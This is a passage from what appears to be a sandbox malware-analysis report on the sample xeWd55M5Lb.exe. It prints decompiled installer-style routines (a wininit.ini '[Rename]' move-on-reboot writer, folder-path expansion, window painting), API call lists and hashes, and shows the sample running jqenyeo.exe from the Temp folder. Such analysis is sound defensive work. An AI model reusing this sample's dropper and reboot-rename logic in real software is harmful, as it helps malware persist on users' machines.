                                                          • C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 00404960
                                                          • N, xrefs: 0040491F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$N
                                                          • API String ID: 3103080414-876093690
                                                          • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                          • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                          • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                          • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004062AE(void* __ecx) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t12;
                                                          				long _t24;
                                                          				char* _t31;
                                                          				int _t37;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				long _t42;
                                                          				WCHAR* _t44;
                                                          				void* _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          
                                                          				_t38 = __ecx;
                                                          				_t44 =  *(_t52 + 0x14);
                                                          				 *0x426de8 = 0x55004e;
                                                          				 *0x426dec = 0x4c;
                                                          				if(_t44 == 0) {
                                                          					L3:
                                                          					_t2 = _t52 + 0x1c; // 0x4275e8
                                                          					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                          						_t53 = _t52 + 0x10;
                                                          						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                          						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                          						_t48 = _t12;
                                                          						 *(_t53 + 0x18) = _t48;
                                                          						if(_t48 != 0xffffffff) {
                                                          							_t42 = GetFileSize(_t48, 0);
                                                          							_t6 = _t37 + 0xa; // 0xa
                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                          							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                          								L18:
                                                          								return CloseHandle(_t48);
                                                          							} else {
                                                          								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                          									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                          									if(_t49 == 0) {
                                                          										_t48 =  *(_t53 + 0x18);
                                                          										L16:
                                                          										_t24 = _t42;
                                                          										L17:
                                                          										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                          										E0040620A(_t48, _t46, _t42 + _t37);
                                                          										GlobalFree(_t46);
                                                          										goto L18;
                                                          									}
                                                          									_t39 = _t46 + _t42;
                                                          									_t31 = _t39 + _t37;
                                                          									while(_t39 > _t49) {
                                                          										 *_t31 =  *_t39;
                                                          										_t31 = _t31 - 1;
                                                          										_t39 = _t39 - 1;
                                                          									}
                                                          									_t24 = _t49 - _t46 + 1;
                                                          									_t48 =  *(_t53 + 0x18);
                                                          									goto L17;
                                                          								}
                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                          								_t42 = _t42 + 0xa;
                                                          								goto L16;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					CloseHandle(E00406158(_t44, 0, 1));
                                                          					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						goto L3;
                                                          					}
                                                          				}
                                                          				return _t12;
                                                          			}



















                                                          0x004062ae
                                                          0x004062b7
                                                          0x004062be
                                                          0x004062c8
                                                          0x004062dc
                                                          0x00406304
                                                          0x0040630b
                                                          0x0040630f
                                                          0x00406313
                                                          0x00406333
                                                          0x0040633a
                                                          0x00406344
                                                          0x00406351
                                                          0x00406356
                                                          0x0040635b
                                                          0x0040635f
                                                          0x0040636e
                                                          0x00406370
                                                          0x0040637d
                                                          0x00406381
                                                          0x0040641c
                                                          0x00000000
                                                          0x00406397
                                                          0x004063a4
                                                          0x004063c8
                                                          0x004063cc
                                                          0x004063eb
                                                          0x004063ef
                                                          0x004063ef
                                                          0x004063f1
                                                          0x004063fa
                                                          0x00406405
                                                          0x00406410
                                                          0x00406416
                                                          0x00000000
                                                          0x00406416
                                                          0x004063ce
                                                          0x004063d1
                                                          0x004063dc
                                                          0x004063d8
                                                          0x004063da
                                                          0x004063db
                                                          0x004063db
                                                          0x004063e3
                                                          0x004063e5
                                                          0x00000000
                                                          0x004063e5
                                                          0x004063af
                                                          0x004063b5
                                                          0x00000000
                                                          0x004063b5
                                                          0x00406381
                                                          0x0040635f
                                                          0x004062de
                                                          0x004062e9
                                                          0x004062f2
                                                          0x004062f6
                                                          0x00000000
                                                          0x00000000
                                                          0x004062f6
                                                          0x00406427

                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                          • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                          • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                          • wsprintfA.USER32 ref: 0040632D
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                          • GlobalFree.KERNEL32 ref: 00406416
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 0040615C
                                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                          • API String ID: 2171350718-2295842750
                                                          • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                          • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                          • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                          • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				struct tagRECT _v32;
                                                          				struct tagPAINTSTRUCT _v96;
                                                          				struct HDC__* _t70;
                                                          				struct HBRUSH__* _t87;
                                                          				struct HFONT__* _t94;
                                                          				long _t102;
                                                          				signed int _t126;
                                                          				struct HDC__* _t128;
                                                          				intOrPtr _t130;
                                                          
                                                          				if(_a8 == 0xf) {
                                                          					_t130 =  *0x42a270;
                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                          					_a8 = _t70;
                                                          					GetClientRect(_a4,  &_v32);
                                                          					_t126 = _v32.bottom;
                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                          					while(_v32.top < _t126) {
                                                          						_a12 = _t126 - _v32.top;
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                          						_v32.bottom = _v32.bottom + 4;
                                                          						_a16 = _t87;
                                                          						FillRect(_a8,  &_v32, _t87);
                                                          						DeleteObject(_a16);
                                                          						_v32.top = _v32.top + 4;
                                                          					}
                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                          						_a16 = _t94;
                                                          						if(_t94 != 0) {
                                                          							_t128 = _a8;
                                                          							_v32.left = 0x10;
                                                          							_v32.top = 8;
                                                          							SetBkMode(_t128, 1);
                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                          							_a8 = SelectObject(_t128, _a16);
                                                          							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                          							SelectObject(_t128, _a8);
                                                          							DeleteObject(_a16);
                                                          						}
                                                          					}
                                                          					EndPaint(_a4,  &_v96);
                                                          					return 0;
                                                          				}
                                                          				_t102 = _a16;
                                                          				if(_a8 == 0x46) {
                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                          				}
                                                          				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                          			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                          • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                          • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                          • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                          				struct _ITEMIDLIST* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _t44;
                                                          				WCHAR* _t45;
                                                          				signed char _t47;
                                                          				signed int _t48;
                                                          				short _t59;
                                                          				short _t61;
                                                          				short _t63;
                                                          				void* _t71;
                                                          				signed int _t77;
                                                          				signed int _t78;
                                                          				short _t81;
                                                          				short _t82;
                                                          				signed char _t84;
                                                          				signed int _t85;
                                                          				void* _t98;
                                                          				void* _t104;
                                                          				intOrPtr* _t105;
                                                          				void* _t107;
                                                          				WCHAR* _t108;
                                                          				void* _t110;
                                                          
                                                          				_t107 = __esi;
                                                          				_t104 = __edi;
                                                          				_t71 = __ebx;
                                                          				_t44 = _a8;
                                                          				if(_t44 < 0) {
                                                          					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                          				}
                                                          				_push(_t71);
                                                          				_push(_t107);
                                                          				_push(_t104);
                                                          				_t105 =  *0x42a298 + _t44 * 2;
                                                          				_t45 = 0x428200;
                                                          				_t108 = 0x428200;
                                                          				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                          					_t108 = _a4;
                                                          					_a4 = _a4 & 0x00000000;
                                                          				}
                                                          				_t81 =  *_t105;
                                                          				_a8 = _t81;
                                                          				if(_t81 == 0) {
                                                          					L43:
                                                          					 *_t108 =  *_t108 & 0x00000000;
                                                          					if(_a4 == 0) {
                                                          						return _t45;
                                                          					}
                                                          					return E00406668(_a4, _t45);
                                                          				} else {
                                                          					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                          						_t98 = 2;
                                                          						_t105 = _t105 + _t98;
                                                          						if(_t81 >= 4) {
                                                          							if(__eflags != 0) {
                                                          								 *_t108 = _t81;
                                                          								_t108 = _t108 + _t98;
                                                          								__eflags = _t108;
                                                          							} else {
                                                          								 *_t108 =  *_t105;
                                                          								_t108 = _t108 + _t98;
                                                          								_t105 = _t105 + _t98;
                                                          							}
                                                          							L42:
                                                          							_t82 =  *_t105;
                                                          							_a8 = _t82;
                                                          							if(_t82 != 0) {
                                                          								_t81 = _a8;
                                                          								continue;
                                                          							}
                                                          							goto L43;
                                                          						}
                                                          						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                          						_t47 =  *_t105;
                                                          						_t48 = _t47 & 0x000000ff;
                                                          						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                          						_t85 = _t84 & 0x000000ff;
                                                          						_v28 = _t48 | 0x00008000;
                                                          						_t77 = 2;
                                                          						_v16 = _t85;
                                                          						_t105 = _t105 + _t77;
                                                          						_v24 = _t48;
                                                          						_v20 = _t85 | 0x00008000;
                                                          						if(_a8 != _t77) {
                                                          							__eflags = _a8 - 3;
                                                          							if(_a8 != 3) {
                                                          								__eflags = _a8 - 1;
                                                          								if(__eflags == 0) {
                                                          									__eflags = (_t48 | 0xffffffff) - _v12;
                                                          									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                          								}
                                                          								L38:
                                                          								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                          								_t45 = 0x428200;
                                                          								goto L42;
                                                          							}
                                                          							_t78 = _v12;
                                                          							__eflags = _t78 - 0x1d;
                                                          							if(_t78 != 0x1d) {
                                                          								__eflags = (_t78 << 0xb) + 0x42b000;
                                                          								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                          							} else {
                                                          								E004065AF(_t108,  *0x42a268);
                                                          							}
                                                          							__eflags = _t78 + 0xffffffeb - 7;
                                                          							if(__eflags < 0) {
                                                          								L29:
                                                          								E004068EF(_t108);
                                                          							}
                                                          							goto L38;
                                                          						}
                                                          						if( *0x42a2e4 != 0) {
                                                          							_t77 = 4;
                                                          						}
                                                          						_t121 = _t48;
                                                          						if(_t48 >= 0) {
                                                          							__eflags = _t48 - 0x25;
                                                          							if(_t48 != 0x25) {
                                                          								__eflags = _t48 - 0x24;
                                                          								if(_t48 == 0x24) {
                                                          									GetWindowsDirectoryW(_t108, 0x400);
                                                          									_t77 = 0;
                                                          								}
                                                          								while(1) {
                                                          									__eflags = _t77;
                                                          									if(_t77 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									_t59 =  *0x42a264;
                                                          									_t77 = _t77 - 1;
                                                          									__eflags = _t59;
                                                          									if(_t59 == 0) {
                                                          										L22:
                                                          										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                          										__eflags = _t61;
                                                          										if(_t61 != 0) {
                                                          											L24:
                                                          											 *_t108 =  *_t108 & 0x00000000;
                                                          											__eflags =  *_t108;
                                                          											continue;
                                                          										}
                                                          										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                          										_a8 = _t61;
                                                          										__imp__CoTaskMemFree(_v8);
                                                          										__eflags = _a8;
                                                          										if(_a8 != 0) {
                                                          											goto L26;
                                                          										}
                                                          										goto L24;
                                                          									}
                                                          									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                          									__eflags = _t63;
                                                          									if(_t63 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									goto L22;
                                                          								}
                                                          								goto L26;
                                                          							}
                                                          							GetSystemDirectoryW(_t108, 0x400);
                                                          							goto L26;
                                                          						} else {
                                                          							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                          							if( *_t108 != 0) {
                                                          								L27:
                                                          								if(_v16 == 0x1a) {
                                                          									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                          								}
                                                          								goto L29;
                                                          							}
                                                          							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                          							L26:
                                                          							if( *_t108 == 0) {
                                                          								goto L29;
                                                          							}
                                                          							goto L27;
                                                          						}
                                                          					}
                                                          					goto L43;
                                                          				}
                                                          			}





























                                                          0x004066a5
                                                          0x004066a5
                                                          0x004066a5
                                                          0x004066ab
                                                          0x004066b0
                                                          0x004066c1
                                                          0x004066c1
                                                          0x004066c9
                                                          0x004066ca
                                                          0x004066cb
                                                          0x004066cc
                                                          0x004066cf
                                                          0x004066d7
                                                          0x004066d9
                                                          0x004066ea
                                                          0x004066ed
                                                          0x004066ed
                                                          0x004066f1
                                                          0x004066f7
                                                          0x004066fa
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068ec
                                                          0x004068ec
                                                          0x00000000
                                                          0x00406700
                                                          0x00406705
                                                          0x0040671a
                                                          0x0040671b
                                                          0x00406721
                                                          0x004068b3
                                                          0x004068c1
                                                          0x004068c4
                                                          0x004068c4
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bd
                                                          0x004068bd
                                                          0x004068c6
                                                          0x004068c6
                                                          0x004068cc
                                                          0x004068cf
                                                          0x00406702
                                                          0x00000000
                                                          0x00406702
                                                          0x00000000
                                                          0x004068cf
                                                          0x00406727
                                                          0x0040672a
                                                          0x00406739
                                                          0x00406740
                                                          0x0040674c
                                                          0x0040674f
                                                          0x00406752
                                                          0x00406753
                                                          0x00406758
                                                          0x0040675e
                                                          0x00406761
                                                          0x00406764
                                                          0x00406857
                                                          0x0040685c
                                                          0x0040688f
                                                          0x00406894
                                                          0x00406899
                                                          0x0040689e
                                                          0x0040689e
                                                          0x004068a3
                                                          0x004068a9
                                                          0x004068ac
                                                          0x00000000
                                                          0x004068ac
                                                          0x0040685e
                                                          0x00406861
                                                          0x00406864
                                                          0x00406879
                                                          0x00406880
                                                          0x00406866
                                                          0x0040686d
                                                          0x0040686d
                                                          0x00406888
                                                          0x0040688b
                                                          0x0040684f
                                                          0x00406850
                                                          0x00406850
                                                          0x00000000
                                                          0x0040688b
                                                          0x00406771
                                                          0x00406775
                                                          0x00406775
                                                          0x00406776
                                                          0x00406778
                                                          0x004067b5
                                                          0x004067b8
                                                          0x004067c8
                                                          0x004067cb
                                                          0x004067d3
                                                          0x004067d9
                                                          0x004067d9
                                                          0x00406834
                                                          0x00406834
                                                          0x00406836
                                                          0x00000000
                                                          0x00000000
                                                          0x004067dd
                                                          0x004067e2
                                                          0x004067e3
                                                          0x004067e5
                                                          0x004067fc
                                                          0x0040680a
                                                          0x00406810
                                                          0x00406812
                                                          0x00406830
                                                          0x00406830
                                                          0x00406830
                                                          0x00000000
                                                          0x00406830
                                                          0x00406818
                                                          0x00406821
                                                          0x00406824
                                                          0x0040682a
                                                          0x0040682e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040682e
                                                          0x004067f6
                                                          0x004067f8
                                                          0x004067fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fa
                                                          0x00000000
                                                          0x00406834
                                                          0x004067c0
                                                          0x00000000
                                                          0x0040677a
                                                          0x00406798
                                                          0x004067a1
                                                          0x0040683e
                                                          0x00406842
                                                          0x0040684a
                                                          0x0040684a
                                                          0x00000000
                                                          0x00406842
                                                          0x004067ab
                                                          0x00406838
                                                          0x0040683c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040683c
                                                          0x00406778
                                                          0x00000000
                                                          0x00406705

                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000400), ref: 004067C0
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4260037668-2823772864
                                                          • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                          • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                          • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                          • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004056CA(signed int _a4, WCHAR* _a8) {
                                                          				struct HWND__* _v8;
                                                          				signed int _v12;
                                                          				WCHAR* _v32;
                                                          				long _v44;
                                                          				int _v48;
                                                          				void* _v52;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				WCHAR* _t27;
                                                          				signed int _t28;
                                                          				long _t29;
                                                          				signed int _t37;
                                                          				signed int _t38;
                                                          
                                                          				_t27 =  *0x429244;
                                                          				_v8 = _t27;
                                                          				if(_t27 != 0) {
                                                          					_t37 =  *0x42a314;
                                                          					_v12 = _t37;
                                                          					_t38 = _t37 & 0x00000001;
